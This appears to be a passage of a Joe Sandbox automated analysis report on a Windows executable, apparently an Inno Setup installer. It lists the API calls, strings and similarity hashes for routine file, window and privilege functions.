                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                          • String ID: SeShutdownPrivilege
                                                                          • API String ID: 107509674-3733053543
                                                                          • Opcode ID: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                          • Instruction ID: 73069b54807863efa740a64668e3ddc19e7753e901194602af91027a354c2964
                                                                          • Opcode Fuzzy Hash: 4672a8203829a771e5d00f2c17f761bc323a5d0378d5eda1ad4e77e08b45408c
                                                                          • Instruction Fuzzy Hash: FDF0687068430275E610AA758C07F2B21989784B5DF50492EBE45EE1C3D7BCD44C8A6E
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C8B1
                                                                          • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C8C1
                                                                          • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C8D1
                                                                          • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047DFC7,00000000,0047DFF0), ref: 0045C8F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$CryptVersion
                                                                          • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                          • API String ID: 1951258720-508647305
                                                                          • Opcode ID: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                          • Instruction ID: b92a23805cb6ee5c0910e5f81ef8443a356b34338ef2df7ef9b51b6282c91381
                                                                          • Opcode Fuzzy Hash: 7e27a9db68ce5781c7a285243bc6d328b0b1bffa5381604cafab58ca7bab5c59
                                                                          • Instruction Fuzzy Hash: 87F049F0901700DEDB14DF76BEC633B7695E7A8316F18803BA619A51A2D738044CCA5C
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884,?,?,00000000,0049A628), ref: 004965BF
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 00496642
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000), ref: 0049665A
                                                                          • FindClose.KERNEL32(000000FF,00496685,0049667E,?,00000000,?,00000000,004966A6,?,?,00000000,0049A628,?,00496830,00000000,00496884), ref: 00496678
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileFind$AttributesCloseFirstNext
                                                                          • String ID: isRS-$isRS-???.tmp
                                                                          • API String ID: 134685335-3422211394
                                                                          • Opcode ID: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                          • Instruction ID: 7c4f1729e62c340c3776f645c08a9404eac4e90145c78096892548085370b188
                                                                          • Opcode Fuzzy Hash: e40fe840e367864820aded220cbe64f4e75f2107195e16c4ed2d0cc84f0cff06
                                                                          • Instruction Fuzzy Hash: 1A31867190161CAFDF10EF65CC51ACEBBBDDB45314F5144B7A808A32A1EA389F458E58
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(oleacc.dll,?,0044E8DD), ref: 0044C03F
                                                                          • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C050
                                                                          • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C060
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                          • API String ID: 2238633743-1050967733
                                                                          • Opcode ID: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                          • Instruction ID: 768994a2e6e1f30713717b1c29876c1fd16d3b2562f205e666220538aba0b6e7
                                                                          • Opcode Fuzzy Hash: c7875b5020b1a0fc70af70b5d3619db3f858b3da6b6721b5bb5bec507322b540
                                                                          • Instruction Fuzzy Hash: BBF01CB0242701CAFB609FF5ECC672632B4E364708F18557BA0016A2E2C7BD9494CF5E
                                                                          APIs
                                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456809
                                                                          • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00456830
                                                                          • SetForegroundWindow.USER32(?), ref: 00456841
                                                                          • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00456B19,?,00000000,00456B55), ref: 00456B04
                                                                          Strings
                                                                          • Cannot evaluate variable because [Code] isn't running yet, xrefs: 00456984
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                          • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                          • API String ID: 2236967946-3182603685
                                                                          • Opcode ID: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                          • Instruction ID: c3083c827e1ea9587a1b946928c79dead0c15e552dd32db2ac5f2442617c6554
                                                                          • Opcode Fuzzy Hash: ea9aa7693e661e956a57dff5922af77563df319d7d3b4e1966ed1c34fece0d0f
                                                                          • Instruction Fuzzy Hash: 6391ED34304204EFDB15DF55C961F5ABBF9EB89305F6280BAEC04A7392C639AE14CB59
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455467), ref: 00455358
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045535E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                          • API String ID: 1646373207-3712701948
                                                                          • Opcode ID: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                          • Instruction ID: 60eca4a99d751df3d3374a87c4cbf3116f086dd8a9115ea48f17d057e3f27308
                                                                          • Opcode Fuzzy Hash: 272051455b5cb91d1d868c6395d7d8b05e26e0b6de4e27da94085abeb1e9e08c
                                                                          • Instruction Fuzzy Hash: 0741A331A00649AFCF01EFA5D892AEFB7B8EF49305F504566F800F7252D67C5D088B69
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00417D1F
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Placement$Iconic
                                                                          • String ID: ,
                                                                          • API String ID: 568898626-3772416878
                                                                          • Opcode ID: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                          • Instruction ID: 117db6d3727d0f94901dea8748b8d47281c3d2add8a8e77c7f929e434730b1f7
                                                                          • Opcode Fuzzy Hash: 26b47a840ef5862fe313a436c6949d2016bb3e60c65edf9f9fab0a84da756b7f
                                                                          • Instruction Fuzzy Hash: 41213171604208ABCF40EF69E8C0EEA77B8AF49314F05456AFD18DF246C678DD84CB68
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,004635C1), ref: 00463435
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 004634C4
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463556
                                                                          • FindClose.KERNEL32(000000FF,0046357D,00463576,?,00000000,?,00000000,00463594,?,00000001,00000000,004635C1), ref: 00463570
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                                          • String ID:
                                                                          • API String ID: 4011626565-0
                                                                          • Opcode ID: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                          • Instruction ID: c18d1c41accea68cb41f5c12e74b437797437286b731c7b532b71dbbd74da020
                                                                          • Opcode Fuzzy Hash: e49648f109a0a58d0dd59af0c8e0b33ee568661d64b452756319b7b75e20b746
                                                                          • Instruction Fuzzy Hash: 7141C870A00658AFCB11EF65CC55ADEB7B8EB88309F4044BAF404A7391E73C9F448E59
                                                                          APIs
                                                                          • SetErrorMode.KERNEL32(00000001,00000000,00463A67), ref: 004638F5
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 0046393B
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 004639F0
                                                                          • FindClose.KERNEL32(000000FF,00463A1B,00463A14,?,00000000,?,00000000,00463A32,?,00000001,00000000,00463A67), ref: 00463A0E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseErrorFirstModeNext
                                                                          • String ID:
                                                                          • API String ID: 4011626565-0
                                                                          • Opcode ID: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                          • Instruction ID: a32f7eebc160b2c926ffd988aba38ac49d653b749f4bb5a92982eb88da04d6a0
                                                                          • Opcode Fuzzy Hash: 9717836182e89b8284e108105af98bb591f0e4e25fd179eca548328e5960a9af
                                                                          • Instruction Fuzzy Hash: B6418175A00A58DBCB10EFA5DC859DEB7B8EB88305F4044AAF804E7341EB78DF458E49
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E7CA
                                                                          • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E7F5
                                                                          • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E802
                                                                          • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E80A
                                                                          • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,0045259F,00000000,004525C0), ref: 0042E810
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                          • String ID:
                                                                          • API String ID: 1177325624-0
                                                                          • Opcode ID: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                          • Instruction ID: 97181128065a238999caafd211b152b701c4b4b5d95cf39bc3f304bf3469fa68
                                                                          • Opcode Fuzzy Hash: e445e4d3b540bec23f5d4472a545cd66e54ba2727ac284448d8f04acb6f91a05
                                                                          • Instruction Fuzzy Hash: 4FF0F0713917203AF620B17A6C82F7B018CCB85F68F10823ABB04FF1C1D9A84C06066D
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00481CEE
                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00481D0C
                                                                          • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D2E
                                                                          • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049B050,0048140A,0048143E,00000000,0048145E,?,?,00000001,0049B050), ref: 00481D42
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Show$IconicLong
                                                                          • String ID:
                                                                          • API String ID: 2754861897-0
                                                                          • Opcode ID: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                          • Instruction ID: bd4bfa8a532e55613b66c26f3878df869b3cba8388d9d733fde35ddb9b3db323
                                                                          • Opcode Fuzzy Hash: c69467129eacf3a94fb6d098dc0e524b237b2cf8676cbdccd17621b53cbb6cc5
                                                                          • Instruction Fuzzy Hash: F50171302402455AD700B72A9D45B5F23D8AB17308F08093BBC51DF6B3DBADAC52974C
                                                                          APIs
                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00461F4C), ref: 00461ED0
                                                                          • FindNextFileA.KERNEL32(000000FF,?,00000000,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F0C
                                                                          • FindClose.KERNEL32(000000FF,00461F33,00461F2C,?,00000000,?,00000000,00461F4C), ref: 00461F26
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext
                                                                          • String ID:
                                                                          • API String ID: 3541575487-0
                                                                          • Opcode ID: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                          • Instruction ID: db92842bd19ae7c5582670e9e06bbe606287ea98b9da9161f37068fcc8ef57ce
                                                                          • Opcode Fuzzy Hash: 1a673c2b66217e2f20547520184ec98711dcfa8b7e2b2042291a9693f5272520
                                                                          • Instruction Fuzzy Hash: 9C21D831A047086ECB15EB65CC41ADEBBBCDB49304F5484F7B808E31B1E7389E45CA5A
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 004241F4
                                                                          • SetActiveWindow.USER32(?,?,?,0046BD86), ref: 00424201
                                                                            • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                            • Part of subcall function 00423B24: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,023325AC,0042421A,?,?,?,0046BD86), ref: 00423B5F
                                                                          • SetFocus.USER32(00000000,?,?,?,0046BD86), ref: 0042422E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveFocusIconicShow
                                                                          • String ID:
                                                                          • API String ID: 649377781-0
                                                                          • Opcode ID: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                          • Instruction ID: b114ffa8fbe078055c417a305beb0b6e8983b6333d82b3c601511fe05fbe2975
                                                                          • Opcode Fuzzy Hash: ed84ae51c3243303549a7701ee85abab7e493b259ddab68dfc4eb862261256dd
                                                                          • Instruction Fuzzy Hash: 07F03A717001208BCB10EFAA98C4B9662A8EF48344B5500BBBC09DF34BCA7CDC0187A8
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 00417D1F
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D3D
                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 00417D73
                                                                          • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D9A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Placement$Iconic
                                                                          • String ID:
                                                                          • API String ID: 568898626-0
                                                                          • Opcode ID: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                          • Instruction ID: b3485382f52430a3de90e88073d2477855dbbaeb9eeee9907b508ce44eeb6dab
                                                                          • Opcode Fuzzy Hash: 78b183ff173bcf850c00c3571251db26553f1d4c2e21dbadcd3fc230454a4dd4
                                                                          • Instruction Fuzzy Hash: 02017C31204108ABDB10EE69E8C1EEA73A8AF45324F054567FD08CF242D639ECC087A8
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CaptureIconic
                                                                          • String ID:
                                                                          • API String ID: 2277910766-0
                                                                          • Opcode ID: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                          • Instruction ID: 1c917faadd476c588bdf1ff4a00e1594475ac94e71cf422183988d33397b9b13
                                                                          • Opcode Fuzzy Hash: da7d7cf270f73b88fe6686235f1bf383b0466356a3000177edae3a378d650de6
                                                                          • Instruction Fuzzy Hash: 85F04F32304A028BDB21A72EC885AEB62F59F84368B14443FE415CB765EB7CDCD58758
                                                                          APIs
                                                                          • IsIconic.USER32(?), ref: 004241AB
                                                                            • Part of subcall function 00423A94: EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                            • Part of subcall function 00423A94: GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                            • Part of subcall function 00423A94: GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                            • Part of subcall function 00423A94: SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                          • SetActiveWindow.USER32(?,?,?,00423D83,00000000,0042416C), ref: 004241BF
                                                                            • Part of subcall function 0042365C: ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
